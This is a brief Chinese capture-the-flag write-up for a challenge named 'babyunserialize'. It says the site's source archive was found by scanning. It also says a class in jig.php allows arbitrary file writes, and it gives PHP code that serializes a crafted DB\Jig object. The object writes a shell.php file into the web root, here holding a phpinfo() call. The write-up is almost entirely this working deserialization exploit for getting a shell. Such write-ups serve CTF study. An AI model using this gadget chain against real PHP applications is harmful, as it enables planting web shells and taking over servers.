babyunserialize
扫出源码www.zip。
jig.php存在任意写,直接getshell。
<?php
namespace DB;
class Jig {
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
protected
$dir = '/var/www/html/',
$format = self::FORMAT_JSON,
$data = array("shell.php"=>array("a"=>"<?php phpinfo();?>")),
$lazy = 1;
}
$jig = new Jig();
echo urlencode(serialize($jig));
Last modified 8mo ago